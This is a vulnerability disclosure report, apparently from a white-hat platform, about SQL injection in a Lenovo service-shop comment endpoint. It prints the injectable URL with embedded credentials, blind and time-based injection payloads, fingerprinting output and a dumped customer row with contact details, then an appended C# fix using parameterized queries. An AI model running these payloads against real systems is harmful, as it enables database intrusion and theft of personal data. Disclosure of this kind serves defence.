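2013-08-26: Details reported to the vendor; awaiting vendor response
2013-08-26: Vendor confirmed; details disclosed to the vendor only
2013-09-05: Details disclosed to core white hats and experts in the relevant field
2013-09-15: Details disclosed to regular white hats
2013-09-25: Details disclosed to trainee white hats
2013-10-10: Details disclosed to the public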
The vulnerabilities just never end. Yet another subsite has an injection point, and this one is a little hidden.
Injection point:
http://serviceshop.lenovo.com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
This is the endpoint for upvoting a comment; the commentsno parameter is vulnerable.
---
Place: GET
Parameter: commentsno
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' AND 9492=9492 AND'uPDv'='uPDv&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=137748597815

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925'; WAITFOR DELAY '00:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' WAITFOR DELAY '0::5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
---
web server operating system: Windows 2003
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Current database:
current database: 'ServiceShop'
78 tables:
[11:08:06] [INFO] fetching number of tables for database 'ServiceShop'
[11:08:06] [INFO] resumed: 78
It was fairly slow, so I only enumerated the first batch of table names.
Dumped the first row of the VIP user table:
+----+------+---------------------+--------+-------------+---------+---------+---------+----------+----------+----------+-----------+-------------+-------------+--------------+
| id | name | email | status | mobile | count | station | cleaned | order_no | username | buy_time | update_ip | remote_code | update_time| cleaned_time |
+----+------+---------------------+--------+-------------+---------+---------+---------+----------+----------+----------+-----------+-------------+-------------+--------------+
| 1 | ?? | [email protected] | ?? | 13520328797 |
+----+------+---------------------+--------+-------------+---------+---------+---------+----------+----------+----------+-----------+-------------+-------------+--------------+
Filter the input.
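The fix the report asks for, sketched as an added example (not code from the report or from Lenovo): an ASP.NET handler that accepts commentsno only if it parses as a GUID and then hands it to SQL Server as a typed parameter. The class name, connection string name, table name and column names are hypothetical.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;

// Hypothetical hardened counterpart of the comment-upvote handler.
public class CommentVoteHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext context)
    {
        // 1. Strict type check: commentsno must parse as a GUID. A value
        //    carrying a quote, "AND 9492=9492" or "WAITFOR DELAY" fails
        //    here, before any SQL text is built. Null input also fails.
        Guid commentId;
        if (!Guid.TryParse(context.Request.QueryString["commentsno"], out commentId))
        {
            context.Response.StatusCode = 400;
            return;
        }

        // 2. Parameterized statement: the value is sent as typed data
        //    (uniqueidentifier) and is never concatenated into the query.
        //    "ServiceShopDb", dbo.CommentTable, CommentNo and UsefulCount
        //    are assumed names, not taken from the real schema.
        string cs = ConfigurationManager.ConnectionStrings["ServiceShopDb"].ConnectionString;
        const string sql =
            "UPDATE dbo.CommentTable SET UsefulCount = UsefulCount + 1 " +
            "WHERE CommentNo = @commentId";

        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@commentId", SqlDbType.UniqueIdentifier).Value = commentId;
            conn.Open();
            int rows = cmd.ExecuteNonQuery();
            // Exactly one row updated means the comment exists.
            context.Response.StatusCode = rows == 1 ? 200 : 404;
        }
    }
}
```

The type check alone would stop the three payloads shown above, but the parameter binding is what keeps the query safe if the validation is later loosened or the column type changes.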
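Severity: High
Vulnerability Rank: 15
Confirmed: 2013-08-26 14:39
Thank you for your contribution to Lenovo's security! We will assess and fix the vulnerability immediately.
None yet.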